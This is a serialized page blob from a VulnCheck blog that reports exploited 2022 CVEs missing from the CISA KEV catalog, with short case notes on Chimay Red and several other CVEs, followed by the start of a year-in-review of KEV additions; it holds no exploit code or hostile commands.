,[51],"ESET Research",[47,106361,33465],{"href":106362,"rel":106363},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2022\u002F04\u002F14\u002Fcve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed\u002F",[51],[313,106365,106366,106369,106371],{},[341,106367,106368],{"align":318},"CVE-2022-27510",[341,106370,331],{"align":318},[341,106372,106373],{"align":318},[47,106374,106377],{"href":106375,"rel":106376},"https:\u002F\u002Fwww.at-bay.com\u002Farticles\u002Flikely-first-exploit-citrix-vulnerability\u002F",[51],"At-Bay",[313,106379,106380,106383,106385],{},[341,106381,106382],{"align":318},"CVE-2022-27226",[341,106384,106215],{"align":318},[341,106386,106387],{"align":318},[47,106388,106254],{"href":106389,"rel":106390},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fenemybot-a-look-into-keksecs-latest-ddos-botnet",[51],[313,106392,106393,106396,106398],{},[341,106394,106395],{"align":318},"CVE-2022-26809",[341,106397,331],{"align":318},[341,106399,106400],{"align":318},[47,106401,106404],{"href":106402,"rel":106403},"https:\u002F\u002Fwww.group-ib.com\u002Fresources\u002Fresearch-hub\u002Fhi-tech-crime-trends-2022\u002F",[51],"Group-IB",[313,106406,106407,106410,106412],{},[341,106408,106409],{"align":318},"CVE-2022-26504",[341,106411,331],{"align":318},[341,106413,106414],{"align":318},[47,106415,106418],{"href":106416,"rel":106417},"https:\u002F\u002Fcloudsek.com\u002Fthreatintelligence\u002Fmultiple-rce-vulnerabilities-affecting-veeam-backup-replication",[51],"Cloudsek",[313,106420,106421,106424,106426],{},[341,106422,106423],{"align":318},"CVE-2022-26210",[341,106425,106215],{"align":318},[341,106427,106428,1246,106432],{"align":318},[47,106429,106254],{"href":106430,"rel":106431},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Ftotolink-vulnerabilities-beastmode-mirai-campaign",[51],[47,106433,106277],{"href":106257,"rel":106434},[51],[313,106436,106437,106440,106442],{},[341,106438,106439],{"align":318},"CVE-2022-26186",[341,106441,106215],{"align":318},[341,106443,106444,1246,106447],{"align":318},[47,106445,106254],{"href":106430,"rel":106446},[51],[47,106448,106277],{"href":106257,"rel":106449},[51],[313,106451,106452,106455,106457],{},[341,106453,106454],{"align":318},"CVE-2022-25084",[341,106456,106215],{"align":318},[341,106458,106459],{"align":318},[47,106460,106254],{"href":106430,"rel":106461},[51],[313,106463,106464,106467,106469],{},[341,106465,106466],{"align":318},"CVE-2022-25083",[341,106468,106215],{"align":318},[341,106470,106471],{"align":318},[47,106472,106254],{"href":106430,"rel":106473},[51],[313,106475,106476,106479,106481],{},[341,106477,106478],{"align":318},"CVE-2022-25082",[341,106480,106215],{"align":318},[341,106482,106483],{"align":318},[47,106484,106254],{"href":106430,"rel":106485},[51],[313,106487,106488,106491,106493],{},[341,106489,106490],{"align":318},"CVE-2022-25081",[341,106492,106215],{"align":318},[341,106494,106495],{"align":318},[47,106496,106254],{"href":106430,"rel":106497},[51],[313,106499,106500,106503,106505],{},[341,106501,106502],{"align":318},"CVE-2022-25080",[341,106504,106215],{"align":318},[341,106506,106507],{"align":318},[47,106508,106254],{"href":106430,"rel":106509},[51],[313,106511,106512,106515,106517],{},[341,106513,106514],{"align":318},"CVE-2022-25079",[341,106516,106215],{"align":318},[341,106518,106519],{"align":318},[47,106520,106254],{"href":106430,"rel":106521},[51],[313,106523,106524,106527,106529],{},[341,106525,106526],{"align":318},"CVE-2022-25078",[341,106528,106215],{"align":318},[341,106530,106531],{"align":318},[47,106532,106254],{"href":106430,"rel":106533},[51],[313,106535,106536,106539,106541],{},[341,106537,106538],{"align":318},"CVE-2022-25077",[341,106540,106215],{"align":318},[341,106542,106543],{"align":318},[47,106544,106254],{"href":106430,"rel":106545},[51],[313,106547,106548,106551,106553],{},[341,106549,106550],{"align":318},"CVE-2022-25076",[341,106552,106215],{"align":318},[341,106554,106555],{"align":318},[47,106556,106254],{"href":106430,"rel":106557},[51],[313,106559,106560,106563,106565],{},[341,106561,106562],{"align":318},"CVE-2022-25075",[341,106564,106215],{"align":318},[341,106566,106567,1246,106570,1246,106575],{"align":318},[47,106568,106254],{"href":106430,"rel":106569},[51],[47,106571,106574],{"href":106572,"rel":106573},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Frapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers",[51],"Alien Labs",[47,106576,106277],{"href":106257,"rel":106577},[51],[313,106579,106580,106583,106585],{},[341,106581,106582],{"align":318},"CVE-2022-24934",[341,106584,106234],{"align":318},[341,106586,106587],{"align":318},[47,106588,106591],{"href":106589,"rel":106590},"https:\u002F\u002Fdecoded.avast.io\u002Fluigicamastra\u002Foperation-dragon-castling-apt-group-targeting-betting-companies\u002F",[51],"Avast",[313,106593,106594,106597,106599],{},[341,106595,106596],{"align":318},"CVE-2022-2486",[341,106598,32556],{"align":318},[341,106600,106601],{"align":318},[47,106602,106234],{"href":106275,"rel":106603},[51],[313,106605,106606,106609,106611],{},[341,106607,106608],{"align":318},"CVE-2022-24500",[341,106610,331],{"align":318},[341,106612,106613],{"align":318},[47,106614,106404],{"href":106402,"rel":106615},[51],[313,106617,106618,106621,106623],{},[341,106619,106620],{"align":318},"CVE-2022-23714",[341,106622,331],{"align":318},[341,106624,106625],{"align":318},[47,106626,106404],{"href":106402,"rel":106627},[51],[313,106629,106630,106633,106635],{},[341,106631,106632],{"align":318},"CVE-2022-2003",[341,106634,106215],{"align":318},[341,106636,106637],{"align":318},[47,106638,106641],{"href":106639,"rel":106640},"https:\u002F\u002Fwww.dragos.com\u002Fblog\u002Fthe-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators\u002F",[51],"Dragos",[313,106643,106644,106647,106649],{},[341,106645,106646],{"align":318},"CVE-2022-0456",[341,106648,106234],{"align":318},[341,106650,106651],{"align":318},[47,106652,106404],{"href":106402,"rel":106653},[51],[313,106655,106656,106659,106661],{},[341,106657,106658],{"align":318},"CVE-2021-46850",[341,106660,106215],{"align":318},[341,106662,106663,106667],{"align":318},[47,106664,106345],{"href":106665,"rel":106666},"https:\u002F\u002Fblog.talosintelligence.com\u002Fnecro-python-bot-adds-new-tricks\u002F",[51]," (see VestaCP)",[313,106669,106670,106672,106674],{},[341,106671,62773],{"align":318},[341,106673,106215],{"align":318},[341,106675,106676,1246,106679],{"align":318},[47,106677,106254],{"href":82020,"rel":106678},[51],[47,106680,106226],{"href":106257,"rel":106681},[51],[313,106683,106684,106687,106689],{},[341,106685,106686],{"align":318},"CVE-2021-41506",[341,106688,106215],{"align":318},[341,106690,106691],{"align":318},[47,106692,10441],{"href":106693,"rel":106694},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F19\u002Fg\u002Fkeeping-a-hidden-identity-mirai-ccs-in-tor-network.html",[51],[313,106696,106697,106700,106702],{},[341,106698,106699],{"align":318},"CVE-2021-4045",[341,106701,106215],{"align":318},[341,106703,106704],{"align":318},[47,106705,106254],{"href":106430,"rel":106706},[51],[313,106708,106709,106712,106714],{},[341,106710,106711],{"align":318},"CVE-2021-4039",[341,106713,106215],{"align":318},[341,106715,106716],{"align":318},[47,106717,106574],{"href":106572,"rel":106718},[51],[313,106720,106721,106724,106726],{},[341,106722,106723],{"align":318},"CVE-2021-31805",[341,106725,106215],{"align":318},[341,106727,106728],{"align":318},[47,106729,106226],{"href":106730,"rel":106731},"https:\u002F\u002Fblog.netlab.360.com\u002Fpublic-cloud-threat-intelligence-202204\u002F",[51],[313,106733,106734,106737,106739],{},[341,106735,106736],{"align":318},"CVE-2017-20149",[341,106738,106215],{"align":318},[341,106740,106741,1246,106745],{"align":318},[47,106742,106226],{"href":106743,"rel":106744},"https:\u002F\u002Fblog.netlab.360.com\u002Fquick-summary-port-8291-scan-en\u002F",[51],[47,106746,106749],{"href":106747,"rel":106748},"https:\u002F\u002Fwww.ndss-symposium.org\u002Fwp-content\u002Fuploads\u002F2019\u002F02\u002Fndss2019_02B-3_Herwig_paper.pdf",[51],"NDSS Symposium",[313,106751,106752,106755,106757],{},[341,106753,106754],{"align":318},"CVE-2016-20017",[341,106756,106215],{"align":318},[341,106758,106759,1246,106762],{"align":318},[47,106760,106226],{"href":81949,"rel":106761},[51],[47,106763,106359],{"href":106764,"rel":106765},"https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2022\u002F10\u002Feset_threat_report_t22022.pdf",[51],[313,106767,106768,106771,106773],{},[341,106769,106770],{"align":318},"CVE-2016-20016",[341,106772,106215],{"align":318},[341,106774,106775,1246,106779],{"align":318},[47,106776,10441],{"href":106777,"rel":106778},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F20\u002Fg\u002Fnew-mirai-variant-expands-arsenal-exploits-cve-2020-10173.html",[51],[47,106780,106359],{"href":106764,"rel":106781},[51],[61,106783,44260],{"id":92047},[18,106785,106786],{},"Looking over the table, it’s probably obvious that an overwhelming majority of the vulnerabilities are related to botnets (64%). However, there are also a number of ransomware (10%) and threat actor (12%) attributions.",[1925,106788,106789],{},[18,106790,106791],{},"Attacker-Type of Exploited Vulnerabilities Assigned CVE in 2022 Missing From CISA KEV",[78559,106793],{":labels":106794,":values":106795},"[\"Botnet\",\"Ransomware\",\"Unattributed\",\"Threat Actor\"]","[27,6,4,5]",[18,106797,106798],{},"The high rate of botnet-exploited vulnerabilities is interesting. Mirai-like botnets are well-known for flinging exploits all over the internet. That behavior is quickly picked up by honeypots and intelligence-sharing organizations like Unit 42, 360 Netlab, and Fortiguard Labs. The high volume of botnet vulnerabilities should be some of the easiest to classify as exploited in the wild.",[18,106800,106801,106802,106806,106807,106812,106813,106817,106818,982,106822,106826],{},"For example, one of the 42 vulnerabilities missing from the CISA KEV Catalog is ",[47,106803,106770],{"href":106804,"rel":106805},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2016-20016",[51]," (aka ",[47,106808,106811],{"href":106809,"rel":106810},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F41471",[51],"EDB-41471","). This vulnerability, which finally received a CVE in 2022, has been exploited in the wild for years, and still has ",[47,106814,86029],{"href":106815,"rel":106816},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22id%3D%5C%22dvr_usr%5C%22%22",[51]," of potential targets online. It’s had a Metasploit module since 2017 and is routinely one of the most widely attempted exploit targets on both ",[47,106819,72430],{"href":106820,"rel":106821},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmonitoring\u002Fvulnerability\u002F?category=monitoring&statistic=unique_ips",[51],[47,106823,86601],{"href":106824,"rel":106825},"https:\u002F\u002Fviz.greynoise.io\u002Ftrends?view=active",[51],". The NVD entry even notes “exploited in the wild in 2017 through 2022.” It’s obvious this vulnerability belongs in the KEV Catalog.",[61,106828,106830],{"id":106829},"vulnerability-classification-and-exploits","Vulnerability Classification and Exploits",[18,106832,106833],{},"Last week, we analyzed the type of vulnerabilities that were added to KEV in 2022. We found about ⅓ of the vulnerabilities are Initial Access, ⅓ are Client Side, and the other ⅓ fell to the remaining five vulnerability types that VulnCheck assigns. However, the 42 missing vulnerabilities don’t match that pattern,likely due to the healthy helping of botnet-exploited vulnerabilities.",[1925,106835,106836],{},[18,106837,106838],{},"Missing Exploited Vulnerabilities Classification",[78559,106840],{":labels":106841,":values":106842},"[\"Client-Side\",\"Local\",\"Initial Access\",\"Credentialed Initial Access\"]","[5,1,32,4]",[18,106844,106845,106846,106850,106851,106856,106857,106862],{},"At VulnCheck, we’re very interested in ",[47,106847,106849],{"href":45535,"rel":106848},[51],"initial access vulnerabilities"," specifically because they are so dangerous. Many of these vulnerabilities appear to provide initial access to small routers and IoT systems. Some will dismiss vulnerabilities in such targets. However, we know those types of targets are used by advanced threat actors to create massive botnets like ",[47,106852,106855],{"href":106853,"rel":106854},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FVPNFilter",[51],"VPNFilter",", and(taken down just last year) ",[47,106858,106861],{"href":106859,"rel":106860},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FCyclops_Blink",[51],"Cyclops Blink",". So, these vulnerabilities should be taken seriously.",[18,106864,106865],{},"They should also be taken seriously because most of them are well-known. More than 30 of the vulnerabilities have public exploits, and at least four of those have Metasploit modules. Additionally, seven have commercially available exploits.",[1925,106867,106868],{},[18,106869,106870],{},"Exploited Vulnerabilities with Exploits",[11128,106872],{":labels":106873,":values":106874},"[\"Public Exploit\",\"Commercial Exploit\"]","[31,7]",[61,106876,106878],{"id":106877},"individual-vulnerabilities","Individual Vulnerabilities",[18,106880,106881],{},"Each of the missing 42 vulnerabilities have interesting context around them too, partly due to the many different sources and unique points of view shared in their public reporting. Going through each would be tedious, but the following sections give insight into a few vulnerabilities that should give readers a general feel for the top vulnerabilities CISA missed.",[993,106883,106885],{"id":106884},"chimay-red","Chimay Red",[18,106887,106888,106892,106893,106898,106899,106904,106905,106910],{},[47,106889,106736],{"href":106890,"rel":106891},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-20149",[51],", also known as Chimay Red, is a peculiar case. The details of the vulnerability were originally leaked in 2017 during the ",[47,106894,106897],{"href":106895,"rel":106896},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FVault_7",[51],"Vault 7 leak",". The vulnerability affected the HTTP interface of Mikrotik routers (of which, there are currently more than ",[47,106900,106903],{"href":106901,"rel":106902},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS%22",[51],"600k"," visible on Shodan). Shortly after the disclosure, a high quality exploit was developed by ",[47,106906,106909],{"href":106907,"rel":106908},"https:\u002F\u002Fgithub.com\u002FBigNerd95\u002FChimay-Red",[51],"Lorenzo Santina",". Eventually attackers, including the Hajime botnet, exploited this vulnerability in the wild.",[18,106912,106913,106914,106918,106919,106923],{},"While the vulnerability is getting old, ",[47,106915,86601],{"href":106916,"rel":106917},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fchimay-red-scanner",[51]," continues to see active scanning for the vulnerability and, using ",[47,106920,41731],{"href":106921,"rel":106922},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS+router%22+os%3A%22MikroTik+RouterOS+6.0%22%2C%226.1%22%2C%226.10%22%2C%226.11%22%2C%226.12%22%2C%226.13%22%2C%226.14%22%2C%226.15%22%2C%226.16%22%2C%226.17%22%2C%226.18%22%2C%226.19%22%2C%226.2%22%2C%226.20%22%2C%226.21%22%2C%226.21.1%22%2C%226.22%22%2C%226.23%22%2C%226.24%22%2C%226.25%22%2C%226.26%22%2C%226.27%22%2C%226.28%22%2C%226.29%22%2C%226.3%22%2C%226.30%22%2C%226.30.1%22%2C%226.30.2%22%2C%226.30.4%22%2C%226.31%22%2C%226.32%22%2C%226.32.1%22%2C%226.32.2%22%2C%226.32.3%22%2C%226.33%22%2C%226.33.1%22%2C%226.33.2%22%2C%226.33.3%22%2C%226.33.5%22%2C%226.34%22%2C%226.34.1%22%2C%226.34.2%22%2C%226.34.3%22%2C%226.34.4%22%2C%226.34.5%22%2C%226.34.6%22%2C%226.35%22%2C%226.35.1%22%2C%226.35.2%22%2C%226.35.4%22%2C%226.36%22%2C%226.36.1%22%2C%226.36.2%22%2C%226.36.3%22%2C%226.37%22%2C%226.37.1%22%2C%226.38%22%2C%226.38.1%22%2C%226.38.2%22%2C%226.38.3%22%2C%226.38.4%22%2C%226.4%22%2C%226.5%22%2C%226.6%22%2C%226.7%22%2C%226.8%22%2C%226.9%22",[51],", we can find approximately 10,000 internet-facing hosts that are still vulnerable.",[18,106925,106926,106927,106930],{},"However, the most fascinating part of Chimay Redis that it didn’t receive a CVE until 2022 when VulnCheck requested one (MITRE chose to back-date the year). This vulnerability has been exploited in the wild for approximately five years, and no one saw fit to request a CVE. Having a CVE ",[1131,106928,106929],{},"is a requirement to be included in the CISA KEV Catalog",", and, sadly, appears to be the only way to remain in the vulnerability historical record.",[18,106932,106933,106934,106939],{},"It’s also worth noting that back when the ",[47,106935,106938],{"href":106936,"rel":106937},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FThe_Shadow_Brokers",[51],"Shadow Brokers"," leak occurred, there was an effort to identify and assign CVE to zero-day vulnerabilities that had been leaked. This was obviously not the case here. The responsible parties should have done the right thing and ensured this was assigned a CVE five years ago. Maybe there wouldn’t be any more vulnerable internet-facing Mikrotik routers if they did.",[993,106941,106350],{"id":106942},"cve-2022-28810",[18,106944,106945,106946,106950,106951,59],{},"[CVE-2022-28810](",[47,106947,106948],{"href":106948,"rel":106949},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28810)",[51],"; is an authenticated unrestricted operating system command execution vulnerability affecting ManageEngine ADSelfService Plus. ManageEngine products have been included in several CISA advisories. For example, in October 2022, a ManageEngine vulnerability, CVE-2021-40539, was included in a bulletin titled, ",[1131,106952,106953],{},[47,106954,106956],{"href":82014,"rel":106955},[51],"Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors",[18,106958,106959,106960,106963,106964,106968],{},"This vulnerability was first seen in the wild in April 2022 as a zero-day by ",[47,106961,33465],{"href":106362,"rel":106962},[51]," (full disclosure: this author was involved in the analysis of the vulnerability). Additionally, ESET Research noted in their ",[47,106965,106967],{"href":106357,"rel":106966},[51],"APT Activity Report T2 2022"," report that a “defense contractor in the US” was targeted using this vulnerability. Although ESET couldn’t attribute the attack to a specific group, it was lumped in with “China-aligned” APT activity.",[993,106970,106632],{"id":106971},"cve-2022-2003",[18,106973,106974,106975,106979,106980,106984],{},"Dragos researchers shared a ",[47,106976,106978],{"href":106639,"rel":106977},[51],"great writeup"," on finding ",[47,106981,106632],{"href":106982,"rel":106983},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-2003",[51]," in the wild. The vulnerability was discovered in a PLC “password cracking” program advertised on social media. Dragos found the cracking software actually worked as advertised, and the software recovered passwords from AutomationDirect’s DirectLOGIC PLC by exploiting CVE-2022-2003. Also, hilariously, the cracking software drops malware on the host machine in order to join it to the Sality botnet.",[18,106986,106987],{},"ICS-specific vulnerabilities exploited in the wild are few and far between. Dragos uncovered an attacker specifically targeting PLC and engineering workstations. Given the attacker’s active engagement on social media, this vulnerability seems like it should have been an easy add to the KEV Catalog.",[993,106989,106336],{"id":106990},"cve-2022-31199",[18,106992,106993,106994,106998,106999,59],{},"Cisco Talos was able to link ",[47,106995,106336],{"href":106996,"rel":106997},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-31199",[51],", a vulnerability in Netwrix Auditor, to Truebot activity (and eventually Clop ransomware) in an early December 2022 ",[47,107000,11046],{"href":106343,"rel":107001},[51],[18,107003,107004,107005,107010],{},"An advisory for CVE-2022-31199 was published by ",[47,107006,107009],{"href":107007,"rel":107008},"https:\u002F\u002Fbishopfox.com\u002Fblog\u002Fnetwrix-auditor-advisory",[51],"Bishop Fox"," in July 2022. The advisory has no CVE, but it is linked directly to NVD. To our knowledge, there is no public exploit for this vulnerability. However, the Bishop Fox advisory, from our experience, provides sufficient details to recreate the exploit with minimal effort. That’s likely why Talos saw the vulnerability exploited a “few weeks” after the advisory was published.",[18,107012,107013,107014,107019],{},"Netwrix Auditor isn’t exactly a household name, and there are ",[47,107015,107018],{"href":107016,"rel":107017},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.banner%3A%22.NET%22+and+Services.banner%3A%22System.Runtime.Remoting.RemotingException%3A+Tcp+channel+protocol+violation%22+and+services.port%3A9004+and+services.service_name%3A%22UNKNOWN%22+and+services.tls.certificates.leaf_data.issuer.common_name%3A%22Netwrix%22",[51],"fewer than a dozen"," internet-facing targets. The fact that an attacker chose to weaponize this vulnerability and it was exploited in the wild shows how valuable initial access vulnerabilities are to attackers.",[61,107021,1903],{"id":1902},[18,107023,107024],{},"In this blog, we shared 42 vulnerabilities assigned CVEs in 2022, which were publicly reported to be exploited in the wild. Yet, none of these vulnerabilities are in the CISA KEV Catalog. The CISA KEV Catalog is undoubtedly helpful and a driving force in our industry. Still, as long as it’s missing actively exploited vulnerabilities, it cannot be treated as the authoritative catalog of exploited vulnerabilities. Practitioners should augment vulnerability management programs by seeking out additional sources or finding a source with a more complete dataset.",[18,107026,95204,107027,95208],{},[47,107028,78319],{"href":78319,"rel":107029},[51],{"title":219,"searchDepth":220,"depth":220,"links":107031},[107032,107033,107034,107035,107041],{"id":106131,"depth":220,"text":106132},{"id":92047,"depth":220,"text":44260},{"id":106829,"depth":220,"text":106830},{"id":106877,"depth":220,"text":106878,"children":107036},[107037,107038,107039,107040],{"id":106884,"depth":1266,"text":106885},{"id":106942,"depth":1266,"text":106350},{"id":106971,"depth":1266,"text":106632},{"id":106990,"depth":1266,"text":106336},{"id":1902,"depth":220,"text":1903},"A review of the vulnerabilities that should have been added to the CISA KEV Catalog in 2022, but weren't.",{"slug":107044,"sitemap":107045},"2022-missing-kev-report",{"videos":107046,"images":107047},[],[],"\u002Fblog\u002F2022-missing-kev-report",{"title":106086,"description":107042},"blog\u002F2022-missing-kev-report",[1279],"ggd88Xb4cpKJUCVQGIyNVgo35MQ5BI2bC3PoN4KG8EE",{"id":107054,"title":107055,"articles":107056,"authors":107071,"body":107073,"date":107060,"description":107751,"extension":234,"image":7,"link":7,"meta":107752,"navigation":237,"path":107757,"seo":107758,"series":7,"stem":107759,"subtype":7,"tags":107760,"__hash__":107761},"blog\u002Fblog\u002F2022-cisa-kev-review.md","The VulnCheck 2022 Exploited Vulnerability Report - A Year Long the CISA KEV Catalog - Blog - VulnCheck Review of the CISA KEV Catalog",[107057,107061,107064,107067],{"title":107058,"source":3494,"link":107059,"date":107060},"Risky Biz News: White House unveils National Cybersecurity Strategy","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-white-house-unveils?utm_source=substack&utm_medium=email","2023-03-02",{"title":107062,"source":39566,"link":107063,"date":107060},"The US National Cybersecurity Strategy. Red-teaming critical infrastructure. Cryptojacking. Updates on the hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F41",{"title":107065,"source":85913,"link":107066,"date":107060},"Here's why Biden's new cyber strategy is notable","https:\u002F\u002Fwww.washingtonpost.com\u002Fpolitics\u002F2023\u002F03\u002F02\u002Fhere-why-biden-new-cyber-strategy-is-notable\u002F",{"title":107068,"source":14378,"link":107069,"date":107070},"557 CVEs Added to CISA’s Known Exploited Vulnerabilities Catalog in 2022","https:\u002F\u002Fwww.securityweek.com\u002F557-cves-added-to-cisas-known-exploited-vulnerabilities-catalog-in-2022\u002F","2023-03-06",[107072],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":107074,"toc":107745},[107075,107078,107081,107085,107089,107096,107099,107104,107108,107111,107116,107120,107133,107142,107147,107151,107160,107174,107177,107181,107206,107229,107232,107235,107239,107257,107262,107266,107274,107288,107291,107294,107321,107324,107328,107337,107360,107363,107368,107372,107378,107384,107388,107391,107394,107399,107403,107406,107409,107414,107473,107475,107480,107538,107540,107545,107603,107605,107609,107612,107618,107626,107629,107634,107638,107652,107664,107673,107682,107708,107711,107718,107720,107723,107737,107740],[18,107076,107077],{},"The number of vulnerabilities is growing at an alarming rate. However, knowing which ones have actually been exploited in the wild is critical for the security community. Both red and blue teams benefit from this intel. It helps us sharpen our focus and act faster and with more precision. That’s why the Cyber Security & Infrastructure Agency (CISA) Known Exploited Vulnerability (KEV) Catalog has risen to prominence within the security community. The data it offers is not only useful, but important to almost all of us.",[18,107079,107080],{},"The following VulnCheck 2022 Exploited Vulnerability Report takes a year long review of the CISA KEV Catalog.",[263,107082],{":list":107083,"ico":266,"title":107084},"[\"The KEV Catalog entered 2022 with 311 CVEs and nearly tripled in size by the end of the year, reaching a total of 868 entries.\",\"A majority of the new additions in 2022 weren’t for new vulnerabilities. Of the 557 CVE, only 17% used a CVE-2022 identifier. The oldest added vulnerability came from 2002.\",\"CISA added 93 CVE-2022 vulnerabilities to the Catalog in 2022. That means every week, most defenders could expect almost two newly published vulnerabilities.\",\"Among the 557 newly added CVEs, 22 named vulnerabilities were added, including EternalRomance, EternalBlue, EternalChampion, Shellshock, Heartbleed, EskimoRoll, Shellshock, Dogwalk, SpoolFool, Dirty Pipe, ProxyNotShell, Ripple20 and more.\",\"Since the beginning of 2020, VulnCheck has tracked more than 400 named vulnerabilities. Yet, in 2022, only 4% of the CVE added to KEV had an associated name. The other 96% had no names, but were useful enough to be exploited in the wild.\",\"In 2022, KEVs were weaponized against operating systems, IoT, desktop applications and web browsers the most.\",\"VulnCheck linked 122 (22%) of the newly added vulnerabilities to use in ransomware attacks.\",\"Of the 557 new entries, 200 (35.9%) are initial access vulnerabilities, which VulnCheck recommends prioritizing over client side, local, and credentialed attacks.\",\"Roughly 11% of the KEV entries for CVE published in 2022 were added before or on the same day a public exploit or exploitation details were made public. However, almost half (48%) of vulnerabilities took more than one week to be added to the Catalog.\"]","The VulnCheck 2022 Exploited Vulnerability Report - A Year Long",[61,107086,107088],{"id":107087},"more-than-doubled-in-size","More Than Doubled in Size",[18,107090,107091,107092,107095],{},"In 2022, CISA added ",[1131,107093,107094],{},"a lot"," of vulnerabilities to the KEV Catalog. The Catalog entered 2022 with 311 CVEs and more than doubled in size by the end of the year. CISA added 557 new CVEs to reach a total of 868 entries by the end of 2022.",[18,107097,107098],{},"The addition of 557 CVEs over a single year breaks down to almost 11 new exploited-in-the-wild vulnerabilities added to the Catalog every week. However, the vulnerabilities weren’t actually added in such a linear fashion and a huge chunk of the vulnerabilities were added in March. By the second half of the year, new additions had tapered off.",[1925,107100,107101],{},[18,107102,107103],{},"CISA KEV Entries Published in 2022",[11128,107105],{":labels":107106,":values":107107},"[\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"]","[40,32,226,45,83,49,3,23,25,12,10,9]",[18,107109,107110],{},"A majority of the new additions in 2022 weren’t for new vulnerabilities. Of the 557 CVEs, only 93 (17%) used a CVE-2022 identifier. The following graph shows the 557 CVEs mapped to their CVE-ID year.",[1925,107112,107113],{},[18,107114,107115],{},"2022 CISA KEV Additions By CVE Year",[11128,107117],{":labels":107118,":values":107119},"[2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022]","[1,0,1,1,2,2,3,11,16,8,18,33,25,39,40,61,62,58,31,52,93]",[18,107121,107122,107123,107128,107129,107132],{},"As the graph shows, vulnerabilities throughout the last two decades were added to the KEV list in 2022. The oldest, ",[47,107124,107127],{"href":107125,"rel":107126},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2002-0367",[51],"CVE-2002-0367",", affected Windows NT and Windows 2000 systems. Certainly, there are many active Windows NT\u002F2000 systems across the globe. Still, it’s important to remember that the KEV Catalog is not a list of “currently exploited” vulnerabilities but a list of exploit",[295,107130,107131],{},"ed"," vulnerabilities. The Catalog is fairly young, so it appears 2022 was used to catch up with the historical backlog of exploited vulnerabilities. That inevitably resulted in many old vulnerabilities being added to the Catalog.",[18,107134,107135,107136,107141],{},"Some old vulnerabilities have a lot of staying power, as we’ll later discuss, so they are important to know. But we’re especially interested in the recently published vulnerabilities added to KEV because those are more likely to be active threats. To get a better look at the vulnerabilities published in 2022, we filtered the 557 new KEV entries by their NVD publication date (As an interesting aside, by doing this, we found a KEV entry that hasn’t been published to NVD: ",[47,107137,107140],{"href":107138,"rel":107139},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-8720",[51],"CVE-2019-8720",". The following graph shows the NVD publication dates of the newer vulnerabilities.",[1925,107143,107144],{},[18,107145,107146],{},"NVD Publication Dates of the CVE-2022 Vulnerabilities Added to CISA KEV in 2022",[11128,107148],{":labels":107149,":values":107150},"[\"2022-01\",\"2022-02\",\"2022-03\",\"2022-04\",\"2022-05\",\"2022-06\",\"2022-07\",\"2022-08\",\"2022-09\",\"2022-10\",\"2022-11\",\"2022-12\"]","[4,14,11,12,9,3,7,6,8,4,8,6]",[18,107152,107153,107154,107159],{},"CISA added 92 CVE-2022 vulnerabilities that were published in 2022 (this number should be 93, but ",[47,107155,107158],{"href":107156,"rel":107157},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-42475",[51],"CVE-2022-42475",", Fortinet FortiOS Heap-Based Buffer Overflow, was added to KEV on December 13, 2022, and wasn’t added to NVD until January 2, 2023).",[18,107161,107162,107163,107167,107168,107173],{},"The graph shows that more vulnerabilities from the first half of the year were added to the Catalog compared to the second half. While true now, this might not be the case in a few months. New vulnerabilities aren’t always exploited in the wild immediately, as we’ll see later, and sometimes there’s a delay in adding them to the KEV Catalog. A great example of that is ",[47,107164,106263],{"href":107165,"rel":107166},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-35914",[51],", an ",[47,107169,107172],{"href":107170,"rel":107171},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fglpi-exploitation",[51],"actively exploited vulnerability"," affecting GLPI that was published in September but still hasn’t found its way into the KEV Catalog.",[18,107175,107176],{},"For most defenders, the new vulnerabilities graph should be fairly daunting, even without the missing vulnerabilities added in. Every week in 2022, defenders could expect almost two newly published vulnerabilities would find their way onto the KEV 